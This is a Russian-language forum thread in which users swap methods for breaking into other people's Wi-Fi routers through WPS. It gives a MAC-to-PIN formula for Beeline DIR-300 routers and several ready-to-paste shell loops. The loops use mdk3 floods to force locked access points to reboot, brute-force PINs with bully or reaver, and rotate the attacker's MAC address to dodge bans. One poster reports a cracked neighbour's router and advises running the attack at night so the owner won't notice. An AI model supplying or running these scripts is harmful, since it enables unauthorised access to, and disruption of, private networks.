та да,было бы тогда сказка ,но....только у зюкселя тк прокатывает и всё....все остальные производители перебирать нужно... а толку....это ж не кинетик,тут пин не прокатит,сделанный генератором... кстати....подметил такую особенность:если день солнечный,то такие сигналы от точек офигенные,аж приятно работать ,а как пасмурно,снег и тд....то от этих же точек намного сигнал меньше.... кто ещё подметил такую особенность? учитесь редактировать посты, за оффтоп на пол страницы будет Бан!
Ну почему, если товарищ найдёт закономерность и запрограммирует свой генератор, работающий по новому принципу... почему бы и нет? http://habrahabr.ru/post/209572/ "Технология WiFi преимущественно использует частоты вблизи 2,4 ГГц. Микроволновые печи работают на той же частоте из-за поглощения водой этих частот, что позволяет нагревать воду. Таким образом, любой большой объем воды между вами и точкой доступа уменьшит сигнал. Примеры: деревья (и повышенная влажность рядом с ними из-за испарения), цемент, бетон и шлакоблоки..."
какая ещё закономерность? только у кинетиков такие пины(т.е первод из 16 в 10)другие производители от фонаря придумывают пины......поэтому к ним генератор толку применять то всё равно пин не такой будет,как его переведёт генератор
Из моего опыта, закономерность есть также в DIR-300 от билайна, но алгоритм вычисления немного отличается. Если нужно, объясню.
ну я даже на своём дир 300 пробовал по маку перевести,что бы пин получился,пин абсолютно другой.Потому что все производители,кроме кинетиков пин не по маку делают,а в тп линках вообще можно свой пин придумывать
С ними всё также просто, как с зукселями. Берём вторую часть мака, переводим в 10-ную систему, прибавляем число 756992, и берём по модулю 10000000. Но это актуально только для DIR-300 с билайновской прошивкой. Их мак адрес, как правило, начинается с 2C:AB:25. И по умолчанию WPS отключён. Алгоритм преобразования мака в пин может быть сколь угодно сложным. Перевод из 16 в 10 это лишь один из простейших. Неожиданно, не так ли?)
Делюсь интересным опытом. Как вы знаете, есть точки, которые лочат wps через определенное количество попыток до следующей перезагрузки. Однако, даже после перезагрузки, такие точки в wash все равно продолжают показываться как залоченые. Не знаю, с чем это связано, то ли защита такая, то ли, что более вероятно, криворукие китайцы такое поведение напрограмили. До недавнего времени, я бросал такие точки по понятным причинам. Но тут мне стало интересно, зачем в reaver и bully существует опция -L Я начал разбираться, и понял, что атаку на wps по некоторым точкам с таким поведением, как я описал выше, можно продолжить. Снова десять попыток и снова блокировка до перезагрузки. Далее, вспомнил про mdk3, попробовал напустить ее на такую точку, и о чудо - она перезагрузилась после непродолжительной атаки(10-15секунд). Ну а дальше требовалось просто автоматизировать процесс перебора десяти пинов, атаки mdk для перезагрузки, и снова перебор итд.....Это было уже дело техники. Сделать это можно примерно так: Code: while true do timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m sleep 10 timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0 sleep 3 done Одна точка уже сдалась - тупилинк841. Вторая в процессе, судя по мак - это тоже какой-то тупилинк. Так что метод рабочий, по крайней мере для некоторых девайсов этого производителя. Единственное что - нужно не жадничать, и стараться запускать скрипт исключительно в ночное время, а рано утром выключать, т.к. хозяину ТД вряд ли могут понравиться постоянные её перезагрузки, и соответственно, невозможность нормально пользоваться wifi.
Спасибо за информацию, я поначалу думал что их надо вручную перезагружать хозяину после mdk3 атаки. На точке которая в нашем дворе не прокатило. После нескольких перезагрузок продолжает показывать wps, в винде предлагается нажать wps кнопку а вот ривер не идет, аиреплай говорит "Association denied (code 20). Вы с таким не встречались?
Нет, точек с таким поведением я не видел. Без работающей ассоциации работа протокола wps невозможна. Поэтому непонятно, зачем точка блокирует ассоциацию, при этом показывая, что wps включен. Хотя, возможно, что именно таков и был алгоритм, и ассоциация вместе с wps заработает после нажатия кнопки wps на роутере, о чем и сообщает винда. В любом случае, без работающей ассоциации, удаленно с такой точкой ничего через wps сделать не получится, увы.
Подумал, скорее всего это бан по мак адресу, а впс в винде срабатывал видимо потому что она ставит встроенный адаптер на первое место, а я в бэктрэке юзаю только внешний. Можете написать скрипт который во время перезагрузки точки заодно меняет мак адрес адаптера на рандомный тк программист из меня никакой. Спасибо
У меня такое было с Tp-linkom, тоже не мог понять почему не проходит ассоциация в reaver, пока не разобрался, клиент отключает пин-код роутера, а ставит произвольный свой, reaver показывает наличие открытого WPS, а асосцииацию невозможно произвести, ни с помощью reaver, ни с aireplay-ng.
Не совсем понял, чтоб wps отключился нужно чтоб вмешивался хозяин точки? И можно ли как-то вычислить новый PIN и потом запустить ривер с мак адресом уже подключенного компьютера чтоб получить пароль?
Code: while true do timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m ifconfig mon0 down macchanger -r mon0 ifconfig mon0 up sleep 10 timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0 sleep 3 done
Расскажите пожалуйста "на пальцах",что куда вводить. столкнулась с такой проблемой,что через 10 пинов точка уходит в лок ,обычно на сутки,но с помощью команды mdk3 ,я брала в пример Вашу,точка перезагружается,и снова позволяет пробить 10 пинов. как можно это сделать в автоматическом режиме? точнее-что куда прописать,и пользуюсь я ривером,не bully.
Спасибо) Я когда попробовал сделать также в настройках (TL-WR841N) ассоциация продолжала работать, отключить пин код маршрутизатора = просто залочило wps. Так что видимо код 20 это что то другое. Или может прошивка какая-то особенная, не знаю.
в командной строке в kali linux копируешь и вставляешь одной строкой: Code: while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done;
